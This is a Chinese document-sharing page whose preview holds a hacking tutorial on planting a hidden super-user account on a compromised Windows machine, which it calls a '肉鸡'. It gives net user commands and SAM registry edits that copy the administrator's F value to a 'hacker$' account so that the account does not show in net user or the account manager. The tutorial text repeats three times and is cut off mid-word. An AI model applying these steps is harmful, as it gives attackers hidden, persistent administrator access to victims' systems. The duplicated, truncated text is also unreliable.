




已阅读5页,还剩3页未读, 继续免费阅读
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
为 Windows 系统建立一个隐藏超级用户对 regedit.exe 我想大家都很熟悉,但却不能对注册表的项键设置权限,而 regedt32.exe 最大的优点就是能够对注册表的项键设置权限。nt/XX/xp 的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM 键下,但是除了系统用户 SYSTEM 外,其它用户都无权查看到里面的信息,因此我首先用 regedt32.exe 对 SAM 键为我设置为“完全控制”权限。这样就可以对 SAM 键内的信息进行读写了了。具体步聚如下:1、假设我们是以超级用户 administrator 登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add2、在开始/运行中输入:regedt32.exe 并回车来运行 regedt32.exe。3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator 的身份登录的,所以我就将administrator 加入,并设置权限为“完全控制。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。4、再点“开始”“运行”并输入regedit.exe 回车,启动注册表编辑器 regedit.exe。 打开键:HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$5、将项 hacker$、00000409、000001F4 导出为 hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项 000001F4 下的键F的值复制,并覆盖 hacker$对应的项 00000409 下的键F的值,然后再将 00000409.reg 与hacker.reg 合并。6、在命令行下执行 net user hacker$ /del将用户 hacker$删除:net user hacker$ /del7、在 regedit.exe 的窗口内按 F5 刷新,然后打文件-导入注册表文件将修改好的 hacker.reg 导入注册表即可8、到此,隐藏的超级用户 hacker$已经建好了,然后关闭 regedit.exe。在 regedt32.exe 窗口内把 HKEY_LOCAL_MACHINESAMSAM 键权限改回原来的样子(只要删除添加的帐户 administrator即可)。9、注意:隐藏的超级用户建好后,在帐户管理器看不到 hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用 net user 命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。 对 regedit.exe 我想大家都很熟悉,但却不能对注册表的项键设置权限,而 regedt32.exe 最大的优点就是能够对注册表的项键设置权限。nt/XX/xp 的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM 键下,但是除了系统用户 SYSTEM 外,其它用户都无权查看到里面的信息,因此我首先用 regedt32.exe 对 SAM 键为我设置为“完全控制”权限。这样就可以对 SAM 键内的信息进行读写了了。具体步聚如下:1、假设我们是以超级用户 administrator 登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add2、在开始/运行中输入:regedt32.exe 并回车来运行 regedt32.exe。3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator 的身份登录的,所以我就将administrator 加入,并设置权限为“完全控制。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。4、再点“开始”“运行”并输入regedit.exe 回车,启动注册表编辑器 regedit.exe。 打开键:HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$5、将项 hacker$、00000409、000001F4 导出为 hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项 000001F4 下的键F的值复制,并覆盖 hacker$对应的项 00000409 下的键F的值,然后再将 00000409.reg 与hacker.reg 合并。6、在命令行下执行 net user hacker$ /del将用户 hacker$删除:net user hacker$ /del7、在 regedit.exe 的窗口内按 F5 刷新,然后打文件-导入注册表文件将修改好的 hacker.reg 导入注册表即可8、到此,隐藏的超级用户 hacker$已经建好了,然后关闭 regedit.exe。在 regedt32.exe 窗口内把 HKEY_LOCAL_MACHINESAMSAM 键权限改回原来的样子(只要删除添加的帐户 administrator即可)。9、注意:隐藏的超级用户建好后,在帐户管理器看不到 hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用 net user 命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。 对 regedit.exe 我想大家都很熟悉,但却不能对注册表的项键设置权限,而 regedt32.exe 最大的优点就是能够对注册表的项键设置权限。nt/XX/xp 的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM 键下,但是除了系统用户 SYSTEM 外,其它用户都无权查看到里面的信息,因此我首先用 regedt32.exe 对 SAM 键为我设置为“完全控制”权限。这样就可以对 SAM 键内的信息进行读写了了。具体步聚如下:1、假设我们是以超级用户 administrator 登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add2、在开始/运行中输入:regedt32.exe 并回车来运行 regedt32.exe。3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator 的身份登录的,所以我就将administrator 加入,并设置权限为“完全控制。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。4、再点“开始”“运行”并输入regedit.exe 回车,启动注册表编辑器 regedit.exe。 打开键:HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$5、将项 hacker$、00000409、000001F4 导出为 hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项 000001F4 下的键F的值复制,并覆盖 hacker$对应的项 00000409 下的键F的值,然后再将 00000409.reg 与hacker.reg 合并。6、在命令行下执行 net user hacker$ /del将用户 hacker$删除:net user hacker$ /del7、在 regedit.exe 的窗口内按 F5 刷新,然后打文件-导入注册表文件将修改好的 hacker.reg 导入注册表即可8、到此,隐藏的超级用户 hacker$已经建好了,然后关闭 regedit.exe。在 regedt32.exe 窗口内把 HKEY_LOCAL_MACHIN
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
评论
0/150
提交评论